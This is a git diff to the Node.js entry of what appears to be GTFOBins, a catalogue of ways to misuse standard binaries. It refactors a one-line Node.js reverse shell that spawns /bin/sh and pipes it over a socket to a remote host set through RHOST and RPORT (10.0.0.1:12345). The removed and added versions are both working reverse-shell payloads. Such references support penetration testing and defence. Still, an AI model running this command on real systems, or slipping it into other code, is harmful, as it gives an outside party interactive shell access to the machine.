diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 2f701f6..9013f47 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -15,10 +15,9 @@ functions: export RHOST=10.0.0.1 export RPORT=12345 node -e 'sh = require("child_process").spawn("/bin/sh"); - client = new require("net").Socket(); - client.connect(process.env.RPORT, process.env.RHOST, function () { - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); + net.connect(process.env.RPORT, process.env.RHOST, function () { + this.pipe(sh.stdin); + sh.stdout.pipe(this); + sh.stderr.pipe(this); });' ---- \ No newline at end of file +---